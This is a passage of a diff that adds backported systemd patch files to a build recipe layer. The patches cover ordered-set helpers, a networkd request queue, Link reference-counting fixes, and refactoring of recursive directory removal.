++int _ordered_set_ensure_allocated(OrderedSet **s, const struct hash_ops *ops  HASHMAP_DEBUG_PARAMS);
++#define ordered_set_ensure_allocated(s, ops) _ordered_set_ensure_allocated(s, ops  HASHMAP_DEBUG_SRC_ARGS)
+ 
+-        *s = ordered_set_new(ops);
+-        if (!*s)
+-                return -ENOMEM;
+-
+-        return 0;
+-}
++int _ordered_set_ensure_put(OrderedSet **s, const struct hash_ops *ops, void *p  HASHMAP_DEBUG_PARAMS);
++#define ordered_set_ensure_put(s, hash_ops, key) _ordered_set_ensure_put(s, hash_ops, key  HASHMAP_DEBUG_SRC_ARGS)
+ 
+ static inline OrderedSet* ordered_set_free(OrderedSet *s) {
+         return (OrderedSet*) ordered_hashmap_free((OrderedHashmap*) s);
diff --git a/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch b/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch
new file mode 100644
index 0000000000..42b6e05b55
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch
@@ -0,0 +1,35 @@
+From d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Mon, 26 Apr 2021 23:52:40 +0900
+Subject: [PATCH] ordered-set: introduce
+ ordered_set_clear/free_with_destructor()
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/d38a6476aad3f2cc80a2a4bc11f3898cc06a70f5]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/basic/ordered-set.h | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h
+index a377f20b1f..64df41766f 100644
+--- a/src/basic/ordered-set.h
++++ b/src/basic/ordered-set.h
+@@ -63,6 +63,17 @@ void ordered_set_print(FILE *f, const char *field, OrderedSet *s);
+ #define ORDERED_SET_FOREACH(e, s, i)                                    \
+         for ((i) = ITERATOR_FIRST; ordered_set_iterate((s), &(i), (void**)&(e)); )
+ 
++#define ordered_set_clear_with_destructor(s, f)                 \
++        ({                                                      \
++                OrderedSet *_s = (s);                           \
++                void *_item;                                    \
++                while ((_item = ordered_set_steal_first(_s)))   \
++                        f(_item);                               \
++                _s;                                             \
++        })
++#define ordered_set_free_with_destructor(s, f)                  \
++        ordered_set_free(ordered_set_clear_with_destructor(s, f))
++
+ DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free);
+ DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free_free);
+ 
diff --git a/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch b/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch
new file mode 100644
index 0000000000..06c523834d
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch
@@ -0,0 +1,285 @@
+From 19d9a5adf0c1a6b5a243eea0390f6f6526d569de Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Fri, 7 May 2021 15:39:16 +0900
+Subject: [PATCH] network: add skeleton of request queue
+
+This will be used in later commits.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/19d9a5adf0c1a6b5a243eea0390f6f6526d569de]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/meson.build        |   2 +
+ src/network/networkd-link.c    |  20 +++++-
+ src/network/networkd-manager.c |   7 ++
+ src/network/networkd-manager.h |   2 +
+ src/network/networkd-queue.c   | 121 +++++++++++++++++++++++++++++++++
+ src/network/networkd-queue.h   |  42 ++++++++++++
+ 6 files changed, 192 insertions(+), 2 deletions(-)
+ create mode 100644 src/network/networkd-queue.c
+ create mode 100644 src/network/networkd-queue.h
+
+diff --git a/src/network/meson.build b/src/network/meson.build
+index 4fca3106dc..a8b9232e64 100644
+--- a/src/network/meson.build
++++ b/src/network/meson.build
+@@ -105,6 +105,8 @@ sources = files('''
+         networkd-network.h
+         networkd-nexthop.c
+         networkd-nexthop.h
++        networkd-queue.c
++        networkd-queue.h
+         networkd-route.c
+         networkd-route.h
+         networkd-routing-policy-rule.c
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index 34359b2541..2f33305a27 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -30,6 +30,7 @@
+ #include "networkd-manager.h"
+ #include "networkd-ndisc.h"
+ #include "networkd-neighbor.h"
++#include "networkd-queue.h"
+ #include "networkd-radv.h"
+ #include "networkd-routing-policy-rule.h"
+ #include "networkd-wifi.h"
+
+@@ -2232,6 +2244,8 @@ static int link_reconfigure_internal(Link *link, sd_netlink_message *m, bool for
+         if (r < 0)
+                 return r;
+ 
++        link_drop_requests(link);
++
+         r = link_drop_config(link);
+         if (r < 0)
+                 return r;
+@@ -2664,6 +2678,8 @@ static int link_carrier_lost(Link *link) {
+                 return r;
+         }
+ 
++        link_drop_requests(link);
++
+         r = link_drop_config(link);
+         if (r < 0)
+                 return r;
+diff --git a/src/network/networkd-manager.c b/src/network/networkd-manager.c
+index 562ce5ca54..fd576169a9 100644
+--- a/src/network/networkd-manager.c
++++ b/src/network/networkd-manager.c
+@@ -34,6 +34,7 @@
+ #include "networkd-manager-bus.h"
+ #include "networkd-manager.h"
+ #include "networkd-network-bus.h"
++#include "networkd-queue.h"
+ #include "networkd-speed-meter.h"
+ #include "ordered-set.h"
+ #include "path-util.h"
+@@ -406,6 +407,10 @@ int manager_new(Manager **ret) {
+         if (r < 0)
+                 return r;
+ 
++        r = sd_event_add_post(m->event, NULL, manager_process_requests, m);
++        if (r < 0)
++                return r;
++
+         r = manager_connect_rtnl(m);
+         if (r < 0)
+                 return r;
+@@ -446,6 +451,8 @@ Manager* manager_free(Manager *m) {
+ 
+         free(m->state_file);
+ 
++        m->request_queue = ordered_set_free_with_destructor(m->request_queue, request_free);
++
+         while ((a = hashmap_first_key(m->dhcp6_prefixes)))
+                 (void) dhcp6_prefix_remove(m, a);
+         m->dhcp6_prefixes = hashmap_free(m->dhcp6_prefixes);
+diff --git a/src/network/networkd-manager.h b/src/network/networkd-manager.h
+index 301b97c1a1..26e8802871 100644
+--- a/src/network/networkd-manager.h
++++ b/src/network/networkd-manager.h
+@@ -91,6 +91,8 @@ struct Manager {
+         usec_t speed_meter_usec_old;
+ 
+         bool dhcp4_prefix_root_cannot_set_table;
++
++        OrderedSet *request_queue;
+ };
+ 
+ int manager_new(Manager **ret);
+diff --git a/src/network/networkd-queue.c b/src/network/networkd-queue.c
+new file mode 100644
+index 0000000000..24bb2c845d
+--- /dev/null
++++ b/src/network/networkd-queue.c
+@@ -0,0 +1,121 @@
++/* SPDX-License-Identifier: LGPL-2.1-or-later */
++
++#include "networkd-address.h"
++#include "networkd-manager.h"
++#include "networkd-neighbor.h"
++#include "networkd-nexthop.h"
++#include "networkd-route.h"
++#include "networkd-routing-policy-rule.h"
++#include "networkd-queue.h"
++
++static void request_free_object(RequestType type, void *object) {
++        switch(type) {
++        default:
++                assert_not_reached("invalid request type.");
++        }
++}
++
++Request *request_free(Request *req) {
++        if (!req)
++                return NULL;
++
++        if (req->on_free)
++                req->on_free(req);
++        if (req->consume_object)
++                request_free_object(req->type, req->object);
++        if (req->link && req->link->manager)
++                ordered_set_remove(req->link->manager->request_queue, req);
++        link_unref(req->link);
++
++        return mfree(req);
++}
++
++DEFINE_TRIVIAL_CLEANUP_FUNC(Request*, request_free);
++
++void request_drop(Request *req) {
++        if (req->message_counter)
++                (*req->message_counter)--;
++
++        request_free(req);
++}
++
++int link_queue_request(
++                Link *link,
++                RequestType type,
++                void *object,
++                bool consume_object,
++                unsigned *message_counter,
++                link_netlink_message_handler_t netlink_handler,
++                Request **ret) {
++
++        _cleanup_(request_freep) Request *req = NULL;
++        int r;
++
++        assert(link);
++        assert(link->manager);
++        assert(type >= 0 && type < _REQUEST_TYPE_MAX);
++        assert(object);
++        assert(netlink_handler);
++
++        req = new(Request, 1);
++        if (!req) {
++                if (consume_object)
++                        request_free_object(type, object);
++                return -ENOMEM;
++        }
++
++        *req = (Request) {
++                .link = link,
++                .type = type,
++                .object = object,
++                .consume_object = consume_object,
++                .message_counter = message_counter,
++                .netlink_handler = netlink_handler,
++        };
++
++        link_ref(link);
++
++        r = ordered_set_ensure_put(&link->manager->request_queue, NULL, req);
++        if (r < 0)
++                return r;
++
++        if (req->message_counter)
++                (*req->message_counter)++;
++
++        if (ret)
++                *ret = req;
++
++        TAKE_PTR(req);
++        return 0;
++}
++
++int manager_process_requests(sd_event_source *s, void *userdata) {
++        Manager *manager = userdata;
++        int r;
++
++        assert(manager);
++
++        for (;;) {
++                bool processed = false;
++                Request *req;
++                Iterator i;
++                ORDERED_SET_FOREACH(req, manager->request_queue, i) {
++                        switch(req->type) {
++                        default:
++                                return -EINVAL;
++                        }
++                        if (r < 0)
++                                link_enter_failed(req->link);
++                        if (r > 0) {
++                                ordered_set_remove(manager->request_queue, req);
++                                request_free(req);
++                                processed = true;
++                        }
++                }
++
++                if (!processed)
++                        break;
++        }
++
++        return 0;
++}
+diff --git a/src/network/networkd-queue.h b/src/network/networkd-queue.h
+new file mode 100644
+index 0000000000..4558ae548f
+--- /dev/null
++++ b/src/network/networkd-queue.h
+@@ -0,0 +1,42 @@
++/* SPDX-License-Identifier: LGPL-2.1-or-later */
++#pragma once
++
++#include "sd-event.h"
++
++#include "networkd-link.h"
++
++typedef struct Request Request;
++
++typedef int (*request_after_configure_handler_t)(Request*, void*);
++typedef void (*request_on_free_handler_t)(Request*);
++
++typedef enum RequestType {
++        _REQUEST_TYPE_MAX,
++        _REQUEST_TYPE_INVALID = -EINVAL,
++} RequestType;
++
++typedef struct Request {
++        Link *link;
++        RequestType type;
++        bool consume_object;
++        void *object;
++        void *userdata;
++        unsigned *message_counter;
++        link_netlink_message_handler_t netlink_handler;
++        request_after_configure_handler_t after_configure;
++        request_on_free_handler_t on_free;
++} Request;
++
++Request *request_free(Request *req);
++void request_drop(Request *req);
++
++int link_queue_request(
++                Link *link,
++                RequestType type,
++                void *object,
++                bool consume_object,
++                unsigned *message_counter,
++                link_netlink_message_handler_t netlink_handler,
++                Request **ret);
++
++int manager_process_requests(sd_event_source *s, void *userdata);
diff --git a/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch b/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch
new file mode 100644
index 0000000000..4c402e7e55
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch
@@ -0,0 +1,50 @@
+From 56001f023305ea99329e27141d6e6067596491a9 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Mon, 17 May 2021 15:32:57 +0900
+Subject: [PATCH] network: also drop requests when link enters linger state
+
+Otherwise, if link is removed, several references to the link in remain
+exist in requests.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/56001f023305ea99329e27141d6e6067596491a9]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/networkd-link.c | 24 +++++++++++++-----------
+ 1 file changed, 13 insertions(+), 11 deletions(-)
+
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index 67d01ac44d..b56c232eca 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -1771,6 +1771,18 @@ static void link_drop_from_master(Link *link, NetDev *netdev) {
+         link_unref(set_remove(master->slaves, link));
+ }
+ 
++static void link_drop_requests(Link *link) {
++        Request *req;
++        Iterator i;
++
++        assert(link);
++        assert(link->manager);
++
++        ORDERED_SET_FOREACH(req, link->manager->request_queue, i)
++                if (req->link == link)
++                        request_drop(req);
++}
++
+ void link_drop(Link *link) {
+         if (!link)
+                 return;
+@@ -1782,6 +1793,8 @@ void link_drop(Link *link) {
+         /* Drop all references from other links and manager. Note that async netlink calls may have
+          * references to the link, and they will be dropped when we receive replies. */
+ 
++        link_drop_requests(link);
++
+         link_free_carrier_maps(link);
+ 
+         if (link->network) {
+-- 
+2.17.1
+
diff --git a/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch b/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch
new file mode 100644
index 0000000000..a186bb4095
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch
@@ -0,0 +1,278 @@
+From cc2d7efc5ca09a7de4bec55e80476986839a655c Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Fri, 14 May 2021 15:58:15 +0900
+Subject: [PATCH] network: fix Link reference counter issue
+
+Previously, when link_new() fails, `link_unref()` was called, so,
+`Manager::links` may become dirty.
+This introduces `link_drop_or_unref()` and it will be called on
+failure.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/cc2d7efc5ca09a7de4bec55e80476986839a655c]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/networkd-link.c | 240 ++++++++++++++++++------------------
+ 1 file changed, 122 insertions(+), 118 deletions(-)
+
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index b56c232eca..d493afda4c 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -540,109 +540,6 @@ static int link_update_flags(Link *link,
+         return 0;
+ }
+ 
+-static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) {
+-        _cleanup_(link_unrefp) Link *link = NULL;
+-        uint16_t type;
+-        const char *ifname, *kind = NULL;
+-        int r, ifindex;
+-        unsigned short iftype;
+-
+-        assert(manager);
+-        assert(message);
+-        assert(ret);
+-
+-        /* check for link kind */
+-        r = sd_netlink_message_enter_container(message, IFLA_LINKINFO);
+-        if (r == 0) {
+-                (void) sd_netlink_message_read_string(message, IFLA_INFO_KIND, &kind);
+-                r = sd_netlink_message_exit_container(message);
+-                if (r < 0)
+-                        return r;
+-        }
+-
+-        r = sd_netlink_message_get_type(message, &type);
+-        if (r < 0)
+-                return r;
+-        else if (type != RTM_NEWLINK)
+-                return -EINVAL;
+-
+-        r = sd_rtnl_message_link_get_ifindex(message, &ifindex);
+-        if (r < 0)
+-                return r;
+-        else if (ifindex <= 0)
+-                return -EINVAL;
+-
+-        r = sd_rtnl_message_link_get_type(message, &iftype);
+-        if (r < 0)
+-                return r;
+-
+-        r = sd_netlink_message_read_string(message, IFLA_IFNAME, &ifname);
+-        if (r < 0)
+-                return r;
+-
+-        link = new(Link, 1);
+-        if (!link)
+-                return -ENOMEM;
+-
+-        *link = (Link) {
+-                .n_ref = 1,
+-                .manager = manager,
+-                .state = LINK_STATE_PENDING,
+-                .ifindex = ifindex,
+-                .iftype = iftype,
+-
+-                .n_dns = (unsigned) -1,
+-                .dns_default_route = -1,
+-                .llmnr = _RESOLVE_SUPPORT_INVALID,
+-                .mdns = _RESOLVE_SUPPORT_INVALID,
+-                .dnssec_mode = _DNSSEC_MODE_INVALID,
+-                .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID,
+-        };
+-
+-        link->ifname = strdup(ifname);
+-        if (!link->ifname)
+-                return -ENOMEM;
+-
+-        if (kind) {
+-                link->kind = strdup(kind);
+-                if (!link->kind)
+-                        return -ENOMEM;
+-        }
+-
+-        r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t *)&link->master_ifindex);
+-        if (r < 0)
+-                log_link_debug_errno(link, r, "New device has no master, continuing without");
+-
+-        r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac);
+-        if (r < 0)
+-                log_link_debug_errno(link, r, "MAC address not found for new device, continuing without");
+-
+-        if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0)
+-                return -ENOMEM;
+-
+-        if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0)
+-                return -ENOMEM;
+-
+-        if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0)
+-                return -ENOMEM;
+-
+-        r = hashmap_ensure_allocated(&manager->links, NULL);
+-        if (r < 0)
+-                return r;
+-
+-        r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link);
+-        if (r < 0)
+-                return r;
+-
+-        r = link_update_flags(link, message, false);
+-        if (r < 0)
+-                return r;
+-
+-        *ret = TAKE_PTR(link);
+-
+-        return 0;
+-}
+-
+ void link_ntp_settings_clear(Link *link) {
+         link->ntp = strv_free(link->ntp);
+ }
+@@ -2030,9 +1927,9 @@ static void link_drop_requests(Link *lin
+                         request_drop(req);
+ }
+ 
+-void link_drop(Link *link) {
++Link *link_drop(Link *link) {
+         if (!link)
+-                return;
++                return NULL;
+ 
+         assert(link->manager);
+ 
+@@ -2057,7 +1954,7 @@ void link_drop(Link *link) {
+ 
+         /* The following must be called at last. */
+         assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
+-        link_unref(link);
++        return link_unref(link);
+ }
+ 
+ static int link_joined(Link *link) {
+@@ -3295,6 +3192,112 @@ ipv4ll_address_fail:
+ 
+         return 0;
+ }
++
++static Link *link_drop_or_unref(Link *link) {
++        if (!link)
++                return NULL;
++        if (!link->manager)
++                return link_unref(link);
++        return link_drop(link);
++}
++
++DEFINE_TRIVIAL_CLEANUP_FUNC(Link*, link_drop_or_unref);
++
++static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) {
++        _cleanup_(link_drop_or_unrefp) Link *link = NULL;
++        uint16_t type;
++        _cleanup_free_ char *ifname = NULL, *kind = NULL;
++        int r, ifindex;
++        unsigned short iftype;
++
++        assert(manager);
++        assert(message);
++        assert(ret);
++
++        r = sd_netlink_message_get_type(message, &type);
++        if (r < 0)
++                return r;
++        else if (type != RTM_NEWLINK)
++                return -EINVAL;
++
++        r = sd_rtnl_message_link_get_ifindex(message, &ifindex);
++        if (r < 0)
++                return r;
++        else if (ifindex <= 0)
++                return -EINVAL;
++
++        r = sd_rtnl_message_link_get_type(message, &iftype);
++        if (r < 0)
++                return r;
++
++        r = sd_netlink_message_read_string_strdup(message, IFLA_IFNAME, &ifname);
++        if (r < 0)
++                return r;
++
++        /* check for link kind */
++        r = sd_netlink_message_enter_container(message, IFLA_LINKINFO);
++        if (r >= 0) {
++                (void) sd_netlink_message_read_string_strdup(message, IFLA_INFO_KIND, &kind);
++                r = sd_netlink_message_exit_container(message);
++                if (r < 0)
++                        return r;
++        }
++
++        link = new(Link, 1);
++        if (!link)
++                return -ENOMEM;
++
++        *link = (Link) {
++                .n_ref = 1,
++                .state = LINK_STATE_PENDING,
++                .ifindex = ifindex,
++                .iftype = iftype,
++                .ifname = TAKE_PTR(ifname),
++                .kind = TAKE_PTR(kind),
++
++                .n_dns = (unsigned) -1,
++                .dns_default_route = -1,
++                .llmnr = _RESOLVE_SUPPORT_INVALID,
++                .mdns = _RESOLVE_SUPPORT_INVALID,
++                .dnssec_mode = _DNSSEC_MODE_INVALID,
++                .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID,
++        };
++
++        r = hashmap_ensure_allocated(&manager->links, NULL);
++        if (r < 0)
++                return r;
++
++        r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link);
++        if (r < 0)
++                return r;
++
++        link->manager = manager;
++
++        r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t*) &link->master_ifindex);
++        if (r < 0)
++                log_link_debug_errno(link, r, "New device has no master, continuing without");
++
++        r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac);
++        if (r < 0)
++                log_link_debug_errno(link, r, "MAC address not found for new device, continuing without");
++
++        if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0)
++                return -ENOMEM;
++
++        if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0)
++                return -ENOMEM;
++
++        if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0)
++                return -ENOMEM;
++
++        r = link_update_flags(link, message, false);
++        if (r < 0)
++                return r;
++
++        *ret = TAKE_PTR(link);
++
++        return 0;
++}
+ 
+ int link_add(Manager *m, sd_netlink_message *message, Link **ret) {
+         _cleanup_(sd_device_unrefp) sd_device *device = NULL;
+
+--- a/src/network/networkd-link.h	2021-09-02 18:04:16.900542857 +0530
++++ b/src/network/networkd-link.h	2021-09-02 18:18:56.776571563 +0530
+@@ -175,7 +175,7 @@ DEFINE_TRIVIAL_DESTRUCTOR(link_netlink_d
+ 
+ int link_get(Manager *m, int ifindex, Link **ret);
+ int link_add(Manager *manager, sd_netlink_message *message, Link **ret);
+-void link_drop(Link *link);
++Link *link_drop(Link *link);
+ 
+ int link_down(Link *link, link_netlink_message_handler_t callback);
+ 
+
diff --git a/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch b/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch
new file mode 100644
index 0000000000..65bdc611df
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch
@@ -0,0 +1,67 @@
+From 63130eb36dc51e4fd50716c585f98ebe456ca7cf Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Mon, 17 May 2021 15:40:15 +0900
+Subject: [PATCH] network: merge link_drop() and link_detach_from_manager()
+
+link_detach_from_manager() is only called by link_drop(). It is not
+necessary to split such tiny function.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/63130eb36dc51e4fd50716c585f98ebe456ca7cf]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/networkd-link.c | 27 ++++++++++++---------------
+ 1 file changed, 12 insertions(+), 15 deletions(-)
+
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index 9d30e16b0a..67d01ac44d 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -2019,24 +2019,17 @@ static void link_drop_from_master(Link *link, NetDev *netdev) {
+         link_unref(set_remove(master->slaves, link));
+ }
+ 
+-static void link_detach_from_manager(Link *link) {
+-        if (!link || !link->manager)
+-                return;
+-
+-        link_unref(set_remove(link->manager->links_requesting_uuid, link));
+-        link_clean(link);
+-
+-        /* The following must be called at last. */
+-        assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
+-        link_unref(link);
+-}
+-
+ void link_drop(Link *link) {
+-        if (!link || link->state == LINK_STATE_LINGER)
++        if (!link)
+                 return;
+ 
++        assert(link->manager);
++
+         link_set_state(link, LINK_STATE_LINGER);
+ 
++        /* Drop all references from other links and manager. Note that async netlink calls may have
++         * references to the link, and they will be dropped when we receive replies. */
++
+         link_free_carrier_maps(link);
+ 
+         if (link->network) {
+@@ -2044,10 +2037,14 @@ void link_drop(Link *link) {
+                 link_drop_from_master(link, link->network->bond);
+         }
+ 
+-        log_link_debug(link, "Link removed");
++        link_unref(set_remove(link->manager->links_requesting_uuid, link));
+ 
+         (void) unlink(link->state_file);
+-        link_detach_from_manager(link);
++        link_clean(link);
++
++        /* The following must be called at last. */
++        assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
++        link_unref(link);
+ }
+ 
+ static int link_joined(Link *link) {
diff --git a/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch b/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch
new file mode 100644
index 0000000000..b860da008c
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch
@@ -0,0 +1,35 @@
+Backport of the following upstream commit:
+From bdfe7ada0d4d66e6d6e65f2822acbb1ec230f9c2 Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Tue, 5 Oct 2021 10:32:56 +0200
+Subject: [PATCH] rm-rf: optionally fsync() after removing directory tree
+
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 3 +++
+ src/basic/rm-rf.h | 1 +
+ 2 files changed, 4 insertions(+)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -161,6 +161,9 @@
+                         ret = r;
+         }
+ 
++        if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(dirfd(d)) < 0 && ret >= 0)
++                ret = -errno;
++
+         return ret;
+ }
+ 
+--- a/src/basic/rm-rf.h
++++ b/src/basic/rm-rf.h
+@@ -11,6 +11,7 @@
+         REMOVE_PHYSICAL         = 1 << 2, /* If not set, only removes files on tmpfs, never physical file systems */
+         REMOVE_SUBVOLUME        = 1 << 3, /* Drop btrfs subvolumes in the tree too */
+         REMOVE_MISSING_OK       = 1 << 4, /* If the top-level directory is missing, ignore the ENOENT for it */
++        REMOVE_SYNCFS           = 1 << 7, /* syncfs() the root of the specified directory after removing everything in it */
+ } RemoveFlags;
+ 
+ int rm_rf_children(int fd, RemoveFlags flags, const struct stat *root_dev);
diff --git a/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch b/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch
new file mode 100644
index 0000000000..f80e6433c6
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch
@@ -0,0 +1,318 @@
+Backport of the following upstream commit:
+From 96906b22417c65d70933976e0ee920c70c9113a4 Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Tue, 26 Jan 2021 16:30:06 +0100
+Subject: [PATCH] rm-rf: refactor rm_rf_children(), split out body of directory
+ iteration loop
+
+This splits out rm_rf_children_inner() as body of the loop. We can use
+that to implement rm_rf_child() for deleting one specific entry in a
+directory.
+
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 223 ++++++++++++++++++++++++++-------------------
+ src/basic/rm-rf.h |   3 +-
+ 2 files changed, 131 insertions(+), 95 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -19,138 +19,153 @@
+ #include "stat-util.h"
+ #include "string-util.h"
+ 
++/* We treat tmpfs/ramfs + cgroupfs as non-physical file sytems. cgroupfs is similar to tmpfs in a way after
++ * all: we can create arbitrary directory hierarchies in it, and hence can also use rm_rf() on it to remove
++ * those again. */
+ static bool is_physical_fs(const struct statfs *sfs) {
+         return !is_temporary_fs(sfs) && !is_cgroup_fs(sfs);
+ }
+ 
+-int rm_rf_children(int fd, RemoveFlags flags, struct stat *root_dev) {
++static int rm_rf_children_inner(
++                int fd,
++                const char *fname,
++                int is_dir,
++                RemoveFlags flags,
++                const struct stat *root_dev) {
++
++        struct stat st;
++        int r;
++
++        assert(fd >= 0);
++        assert(fname);
++
++        if (is_dir < 0 || (is_dir > 0 && (root_dev || (flags & REMOVE_SUBVOLUME)))) {
++
++                r = fstatat(fd, fname, &st, AT_SYMLINK_NOFOLLOW);
++                if (r < 0)
++                        return r;
++
++                is_dir = S_ISDIR(st.st_mode);
++        }
++
++        if (is_dir) {
++                _cleanup_close_ int subdir_fd = -1;
++                int q;
++
++                /* if root_dev is set, remove subdirectories only if device is same */
++                if (root_dev && st.st_dev != root_dev->st_dev)
++                        return 0;
++
++                /* Stop at mount points */
++                r = fd_is_mount_point(fd, fname, 0);
++                if (r < 0)
++                        return r;
++                if (r > 0)
++                        return 0;
++
++                if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
++
++                        /* This could be a subvolume, try to remove it */
++
++                        r = btrfs_subvol_remove_fd(fd, fname, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
++                        if (r < 0) {
++                                if (!IN_SET(r, -ENOTTY, -EINVAL))
++                                        return r;
++
++                                /* ENOTTY, then it wasn't a btrfs subvolume, continue below. */
++                        } else
++                                /* It was a subvolume, done. */
++                                return 1;
++                }
++
++                subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
++                if (subdir_fd < 0)
++                        return -errno;
++
++                /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file system type
++                 * again for each directory */
++                q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
++
++                r = unlinkat(fd, fname, AT_REMOVEDIR);
++                if (r < 0)
++                        return r;
++                if (q < 0)
++                        return q;
++
++                return 1;
++
++        } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
++                r = unlinkat(fd, fname, 0);
++                if (r < 0)
++                        return r;
++
++                return 1;
++        }
++
++        return 0;
++}
++
++int rm_rf_children(
++                int fd,
++                RemoveFlags flags,
++                const struct stat *root_dev) {
++
+         _cleanup_closedir_ DIR *d = NULL;
+         struct dirent *de;
+         int ret = 0, r;
+-        struct statfs sfs;
+ 
+         assert(fd >= 0);
+ 
